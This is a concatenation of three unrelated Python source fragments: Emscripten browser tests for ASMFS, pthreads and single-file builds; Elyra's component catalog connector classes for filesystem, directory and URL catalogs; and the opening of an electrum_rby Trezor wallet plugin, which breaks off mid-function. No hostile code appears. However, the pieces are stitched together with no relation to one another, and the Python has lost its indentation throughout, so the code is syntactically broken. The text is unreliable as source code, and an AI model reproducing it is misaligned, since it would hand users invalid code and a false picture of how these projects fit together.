self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in single-threaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Tests the absolute minimum pthread-enabled application.
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
Popen([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0']).communicate()
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"]).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
Popen([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-o', 'test.html', '-O3']).communicate()
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write(src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-o', 'test.js', '-O3'] + args).communicate()
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write('''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# we also eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for args, creation in [
(['-s', 'MODULARIZE=1'], 'Module();'),
(['-s', 'MODULARIZE_INSTANCE=1'], '')
]:
print(args, creation)
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-o', 'test.js'] + args).communicate()
open('test.html', 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('test.html', None, '/report_result?0')
|
catalog_connector.py
|
#
# Copyright 2018-2021 Elyra Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import abstractmethod
import hashlib
from http import HTTPStatus
import os
from pathlib import Path
from queue import Empty
from queue import Queue
from threading import Thread
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from jupyter_core.paths import ENV_JUPYTER_PATH
import requests
from traitlets.config import LoggingConfigurable
from traitlets.traitlets import default
from traitlets.traitlets import Integer
from elyra.metadata.metadata import Metadata
class ComponentCatalogConnector(LoggingConfigurable):
"""
Abstract class to model component_entry readers that can read components from different locations
"""
max_threads_default = 3
max_readers_env = 'ELYRA_CATALOG_CONNECTOR_MAX_READERS'
max_readers = Integer(max_threads_default,
help="""Sets the maximum number of reader threads to be used to read
catalog entries in parallel""").tag(config=True)
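    # The reader-thread count can be overridden via the ELYRA_CATALOG_CONNECTOR_MAX_READERS
    # environment variable; non-integer values fall back to max_threads_default (see below).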
@default('max_readers')
def max_readers_default(self):
max_reader_threads = ComponentCatalogConnector.max_threads_default
try:
max_reader_threads = int(os.getenv(self.max_readers_env, max_reader_threads))
except ValueError:
pass
return max_reader_threads
def __init__(self, file_types: List[str], **kwargs):
super().__init__(**kwargs)
self._file_types = file_types
@abstractmethod
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
Each catalog_entry_data dictionary contains the information needed to access a single component
definition. The form that each catalog_entry_data takes is determined by the unique requirements
of the reader class.
For example, the FilesystemCatalogConnector includes both a base directory ('base_dir') key-value
pair and a relative path ('path') key-value pair in its 'catalog_entry_data' dict. Both fields
are needed in order to access the corresponding component definition in read_catalog_entry().
Every catalog_entry_data should contain each of the keys returned in get_hash_keys() to ensure
uniqueness and portability among entries. For the same reason, no two catalog entries should have
equivalent catalog_entry_data dictionaries.
:param catalog_metadata: the dictionary form of the metadata associated with a single catalog;
the general structure is given in the example below
example:
{
"description": "...", # only present if a description is added
"runtime_type": "...", # must be present
"categories": ["category1", "category2", ...], # may be an empty array
"your_property1": value1,
"your_property2": value2,
...
}
:returns: a list of catalog entry dictionaries, each of which contains the information
needed to access a component definition in read_catalog_entry()
"""
raise NotImplementedError(
"abstract method 'get_catalog_entries()' must be implemented"
)
@abstractmethod
def read_catalog_entry(self,
catalog_entry_data: Dict[str, Any],
catalog_metadata: Dict[str, Any]) -> Optional[str]:
"""
Reads a component definition for a single catalog entry using the catalog_entry_data returned
from get_catalog_entries() and, if needed, the catalog metadata.
:param catalog_entry_data: a dictionary that contains the information needed to read the content
of the component definition; below is an example data structure returned
from get_catalog_entries()
example:
{
"directory_path": "/Users/path/to/directory",
"relative_path": "subdir/file.py"
}
:param catalog_metadata: the metadata associated with the catalog in which this catalog entry is
stored; this is the same dictionary that is passed into get_catalog_entries();
in addition to catalog_entry_data, catalog_metadata may also be
needed to read the component definition for certain types of catalogs
:returns: the content of the given catalog entry's definition in string form, if found, or None;
if None is returned, this catalog entry is skipped and a warning message logged
"""
raise NotImplementedError(
"abstract method 'read_catalog_entry()' must be implemented"
)
@abstractmethod
def get_hash_keys(self) -> List[Any]:
"""
Provides a list of keys, available in the 'catalog_entry_data' dictionary, whose values
will be used to construct a unique hash id for each entry with the given catalog type.
Besides being a means to uniquely identify a single component (catalog entry), the hash id
also enables pipeline portability across installations when the keys returned here are
chosen strategically. For example, the FilesystemCatalogConnector includes both a base
directory key-value pair and a relative path key-value pair in its 'catalog_entry_data' dict.
Both fields are required to access the component definition in read_catalog_entry(), but
only the relative path field is used to create the unique hash. This allows a component
that has the same relative path defined in two separate catalogs in two separate
installations to resolve to the same unique id in each, and therefore to be portable across
pipelines in these installations.
To ensure the hash is unique, no two catalog entries can have the same key-value pairs
over the set of keys returned by this function. If two entries resolve to the same hash,
the one whose definition is read last will overwrite the other(s).
Example:
Given a set of keys ['key1', 'key2', 'key3'], the below two catalog_entry_data dictionaries
will produce unique hashes. The same cannot be said, however, if the set of keys
returned is ['key2', 'key3'].
component_entry_data for entry1:              component_entry_data for entry2:
{                                             {
    'key1': 'value1',                             'key1': 'value4',
    'key2': 'value2',                             'key2': 'value2',
    'key3': 'value3'                              'key3': 'value3'
}                                             }
Additionally, every catalog_entry_data dict should include each key in the set returned
here. If this is not the case, a catalog entry's portability and uniqueness may be negatively
affected.
:returns: a list of keys
"""
raise NotImplementedError(
"abstract method 'get_hash_keys()' must be implemented"
)
def get_unique_component_hash(self,
catalog_type: str,
catalog_entry_data: Dict[str, Any],
catalog_hash_keys: List[Any]) -> str:
"""
Constructs a unique hash for the given component based on the name of the catalog
connector class and any information specific to that component-and-catalog-type
combination as given in catalog_hash_keys.
:param catalog_type: the identifying type of this Connector class, as taken from the
schema_name of the related schema (e.g., url-catalog)
:param catalog_entry_data: the identifying data associated with the catalog entry; this data
structure is one of the dicts returned from get_catalog_entries()
:param catalog_hash_keys: the list of keys (present in the catalog_entry_data dict)
whose values will be used to construct the hash
:returns: a unique component id of the form '<catalog-type>:<hash_of_entry_data>'
"""
hash_str = ""
for key in catalog_hash_keys:
if not catalog_entry_data.get(key):
self.log.warning(f"Catalog entry does not have key '{key}'. Continuing to build hash "
f"string without this key...")
continue
hash_str = hash_str + str(catalog_entry_data[key]) + ":"
hash_str = hash_str[:-1]
# Use only the first 12 characters of the resulting hash
hash_digest = f"{hashlib.sha256(hash_str.encode()).hexdigest()[:12]}"
return f"{catalog_type}:{hash_digest}"
def read_component_definitions(self, catalog_instance: Metadata) -> Dict[str, Dict]:
"""
This function compiles the definitions of all catalog entries in a given catalog.
Catalog entry data is first retrieved for each entry in the given catalog. This data is added
to a queue, and a number of reader threads ('max_readers' or fewer) are started.
Each reader thread pulls the data for a single catalog entry from the queue and uses it to read
the definition associated with that entry.
As a mutable object, the 'catalog_entry_map' provides a means to retrieve a return value for
each thread. If a thread is able to successfully read the content of the given catalog entry,
a unique hash is created for the entry and a mapping is added to the catalog_entry_map.
The catalog_instance Metadata parameter will have the following attributes of interest in
addition to a few additional attributes used internally:
:param catalog_instance: the Metadata instance for this catalog; below is an example instance
example:
display_name: str = "Catalog Name"
schema_name: str = "connector-type"
metadata: Dict[str, Any] = {
"description": "...", # only present if a description is added
"runtime": "...", # must be present
"categories": ["category1", "category2", ...], # may be an empty array
"your_property1": value1,
"your_property2": value2,
...
}
:returns: a mapping of a unique component ids to their definition and identifying data
"""
catalog_entry_map = {}
catalog_entry_q = Queue()
try:
# Retrieve list of keys that will be used to construct
# the catalog entry hash for each entry in the catalog
keys_to_hash = self.get_hash_keys()
# Add catalog entry data dictionaries to the thread queue
for entry_data in self.get_catalog_entries(catalog_instance.metadata):
catalog_entry_q.put_nowait(entry_data)
except NotImplementedError as e:
err_msg = f"{self.__class__.__name__} does not meet the requirements of a catalog connector class: {e}"
self.log.error(err_msg)
except Exception as e:
err_msg = f"Could not get catalog entry information for catalog '{catalog_instance.display_name}': {e}"
# Dump stack trace with error message
self.log.exception(err_msg)
def read_with_thread():
"""
Gets a catalog entry data dictionary from the queue and attempts to read corresponding definition
"""
while not catalog_entry_q.empty():
try:
# Pull a catalog entry dictionary from the queue
catalog_entry_data = catalog_entry_q.get(timeout=.1)
except Empty:
continue
try:
# Read the entry definition given its returned data and the catalog entry data
self.log.debug(f"Attempting read of definition for catalog entry with identifying information: "
f"{str(catalog_entry_data)}...")
definition = self.read_catalog_entry(catalog_entry_data=catalog_entry_data,
catalog_metadata=catalog_instance.metadata)
# Ignore this entry if no definition content is returned
if not definition:
self.log.warning(f"No definition content found for catalog entry with identifying information: "
f"{str(catalog_entry_data)}. Skipping...")
catalog_entry_q.task_done()
continue
# Generate hash for this catalog entry
catalog_entry_id = self.get_unique_component_hash(catalog_type=catalog_instance.schema_name,
catalog_entry_data=catalog_entry_data,
catalog_hash_keys=keys_to_hash)
# Add entry definition and identifying data to mapping
catalog_entry_map[catalog_entry_id] = {
"definition": definition,
"identifier": catalog_entry_data
}
except NotImplementedError as e:
msg = f"{self.__class__.__name__} does not meet the requirements of a catalog connector class: {e}."
self.log.error(msg)
except Exception as e:
# Dump stack trace with error message and continue
self.log.exception(f"Could not read definition for catalog entry with identifying information: "
f"{str(catalog_entry_data)}: {e}")
# Mark this thread's read as complete
catalog_entry_q.task_done()
# Start 'max_readers' reader threads if the catalog includes more than 'max_readers'
# catalog entries, else start one thread per entry
num_threads = min(catalog_entry_q.qsize(), self.max_readers)
for i in range(num_threads):
Thread(target=read_with_thread).start()
# Wait for all queued entries to be processed
catalog_entry_q.join()
return catalog_entry_map
class FilesystemComponentCatalogConnector(ComponentCatalogConnector):
"""
Read a singular component definition from the local filesystem
"""
def get_absolute_path(self, path: str) -> str:
"""
Determines the absolute location of a given path. Error checking is delegated to
the calling function
"""
# Expand path to include user home if necessary
path = os.path.expanduser(path)
# Check for absolute path
if os.path.isabs(path):
return path
# If path is still not absolute, default to the Jupyter share location
return os.path.join(ENV_JUPYTER_PATH[0], 'components', path)
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
:returns: a list of component_entry_data; for the FilesystemComponentCatalogConnector class this
takes the form:
{
'base_dir': 'base/directory/for/file', # can be empty
'path': 'path/to/definition_in_local_fs.ext' # may be relative or absolute
}
"""
catalog_entry_data = []
base_dir = catalog_metadata.get('base_path', '')
if base_dir:
base_dir = self.get_absolute_path(base_dir)
if not os.path.exists(base_dir):
# If the base directory is not found, skip this catalog
self.log.warning(f"Base directory does not exist -> {base_dir}")
return catalog_entry_data
for path in catalog_metadata.get('paths'):
path = os.path.expanduser(path)
if not base_dir and not os.path.isabs(path):
base_dir = os.path.join(ENV_JUPYTER_PATH[0], 'components')
catalog_entry_data.append({
'base_dir': base_dir,
'path': path
})
return catalog_entry_data
def read_catalog_entry(self,
catalog_entry_data: Dict[str, Any],
catalog_metadata: Dict[str, Any]) -> Optional[str]:
"""
Reads a component definition for a single catalog entry using the catalog_entry_data returned
from get_catalog_entries() and, if needed, the catalog metadata.
:param catalog_entry_data: for the Filesystem- and DirectoryComponentCatalogConnector classes,
this includes 'path' and 'base_dir' keys
:param catalog_metadata: Filesystem- and DirectoryComponentCatalogConnector classes do not need this
field to read individual catalog entries
"""
path = os.path.join(catalog_entry_data.get('base_dir', ''), catalog_entry_data.get('path'))
if not os.path.exists(path):
self.log.warning(f"Invalid location for component: {path}")
else:
with open(path, 'r') as f:
return f.read()
return None
def get_hash_keys(self) -> List[Any]:
"""
For the Filesystem- and DirectoryComponentCatalogConnector classes, only the
'path' value is needed from the catalog_entry_data dictionary to construct a
unique hash id for a single catalog entry
"""
return ['path']
class DirectoryComponentCatalogConnector(FilesystemComponentCatalogConnector):
"""
Read component definitions from a local directory
"""
def get_relative_path_from_base(self, base_dir: str, file_path: str) -> str:
"""
Determines the relative portion of a path from the given base directory.
:param base_dir: the absolute path to a base directory to compare against
:param file_path: the absolute path to a file within the given base directory
:returns: the path to the given file relative to the given base directory
Example:
given: base_path = "/path/to/folder"
given: absolute_path = "/path/to/folder/nested/file.py"
returns: 'nested/file.py'
"""
base_list = base_dir.split('/')
absolute_list = file_path.split('/')
while base_list:
base_list = base_list[1:]
absolute_list = absolute_list[1:]
return '/'.join(absolute_list)
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
:returns: a list of catalog_entry_data dictionaries; for the DirectoryComponentCatalogConnector
class each entry takes the form:
{
'base_dir': 'base/directory/for/files', # given in base_path
'path': 'path/to/definition_in_local_fs.ext' # may be relative or absolute
}
"""
catalog_entry_data = []
for dir_path in catalog_metadata.get('paths'):
base_dir = self.get_absolute_path(dir_path)
if not os.path.exists(base_dir):
self.log.warning(f"Invalid directory -> {base_dir}")
continue
# Include '**/' in the glob pattern if files in subdirectories should be included
recursive_flag = "**/" if catalog_metadata.get("include_subdirs", False) else ""
patterns = [f"{recursive_flag}*{file_type}" for file_type in self._file_types]
for file_pattern in patterns:
catalog_entry_data.extend([
{
'base_dir': base_dir,
'path': self.get_relative_path_from_base(base_dir, str(absolute_path))
} for absolute_path in Path(base_dir).glob(file_pattern)
])
return catalog_entry_data
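# Illustrative sketch (not part of the original source): with hypothetical values, the
# glob patterns built above expand as follows for a connector whose _file_types is
# ['.yaml'].
#
#   catalog_metadata = {'paths': ['/opt/components'], 'include_subdirs': True}
#   # patterns == ['**/*.yaml'], so Path('/opt/components').glob('**/*.yaml') also
#   # yields nested files; each is stored with a path relative to base_dir, e.g.
#   # {'base_dir': '/opt/components', 'path': 'nested/filter_text.yaml'}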
class UrlComponentCatalogConnector(ComponentCatalogConnector):
"""
Read a singular component definition from a URL
"""
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
:returns: a list of catalog_entry_data dictionaries; for the UrlComponentCatalogConnector class
each entry takes the form:
{
'url': 'url_of_remote_component_definition'
}
"""
return [{'url': url} for url in catalog_metadata.get('paths')]
def read_catalog_entry(self,
catalog_entry_data: Dict[str, Any],
catalog_metadata: Dict[str, Any]) -> Optional[str]:
"""
Reads a component definition for a single catalog entry using the catalog_entry_data returned
from get_catalog_entries() and, if needed, the catalog metadata.
:param catalog_entry_data: for the UrlComponentCatalogConnector class this includes a 'url' key
:param catalog_metadata: UrlComponentCatalogConnector does not need this field to read
individual catalog entries
"""
url = catalog_entry_data.get('url')
try:
res = requests.get(url)
except Exception as e:
self.log.warning(f"Failed to connect to URL for component: {url}: {e}")
else:
if res.status_code != HTTPStatus.OK:
self.log.warning(f"Invalid location for component: {url} (HTTP code {res.status_code})")
else:
return res.text
return None
def get_hash_keys(self) -> List[Any]:
"""
For the UrlComponentCatalogConnector class, only the 'url' value is needed
from the catalog_entry_data dictionary to construct a unique hash id for a
single catalog entry
"""
return ['url']
|
plugin.py
|
import base64
import re
import threading
from binascii import hexlify, unhexlify
from functools import partial
from electrum_rby.util import bfh, bh2u
from electrum_rby.bitcoin import (is_segwit_address, b58_address_to_hash160, xpub_from_pubkey,
public_key_to_p2pkh, EncodeBase58Check,
TYPE_ADDRESS, TYPE_SCRIPT,
TESTNET, ADDRTYPE_P2PKH, ADDRTYPE_P2SH, ADDRTYPE_P2SH_ALT)
from electrum_rby.i18n import _
from electrum_rby.plugins import BasePlugin, hook
from electrum_rby.transaction import deserialize, Transaction
from electrum_rby.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never return if a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if TESTNET else "Rubycoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER and self.device == 'TREZOR':
# Warn user about firmware lameness
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m')
client.used()
def get_xpub(self, device_id, derivation, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
